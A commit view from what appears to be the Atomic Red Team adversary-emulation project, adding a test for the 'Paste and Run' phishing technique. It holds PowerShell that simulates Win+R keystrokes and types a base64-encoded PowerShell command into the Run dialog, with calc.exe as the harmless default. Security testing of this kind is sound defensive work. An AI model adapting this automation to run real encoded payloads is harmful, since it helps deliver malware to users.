security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Added Paste and Run Technique (#2966)

Browse Source 
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Ahmed Farouk
2024-11-05 23:00:28 +02:00
committed by GitHub
parent f3ee3b833f
commit 868da3b839
1 changed files with 47 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1566.002/T1566.002.yaml
+47
View File
@@ -0,0 +1,47 @@
attack_technique: T1566.002
display_name: 'Phishing: Spearphishing Link'
atomic_tests:
- name: Paste and run technique
auto_generated_guid:
description: |
Tests the **Paste and Run** technique, where users are tricked into running
malicious PowerShell commands by automating the Win+R command to open the
Run dialog and input `encoded PowerShell to execute calc.exe.`
- [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
- [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
supported_platforms:
- windows
input_arguments:
execution_command:
description: The command to execute in the run
type: String
default: 'calc.exe'
executor:
name: powershell
command: |
# Add user32.dll for keybd_event
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
[DllImport("user32.dll")]
public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
}
"@
# Virtual key codes
$VK_LWIN, $VK_R, $KEYDOWN, $KEYUP = 0x5B, 0x52, 0x0000, 0x0002
# Open Run dialog (Win+R)
[K]::keybd_event($VK_LWIN, 0, $KEYDOWN, [UIntPtr]::Zero)
[K]::keybd_event($VK_R, 0, $KEYDOWN, [UIntPtr]::Zero)
[K]::keybd_event($VK_R, 0, $KEYUP, [UIntPtr]::Zero)
[K]::keybd_event($VK_LWIN, 0, $KEYUP, [UIntPtr]::Zero)
# Short delay for Run dialog
Start-Sleep -Milliseconds 500
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")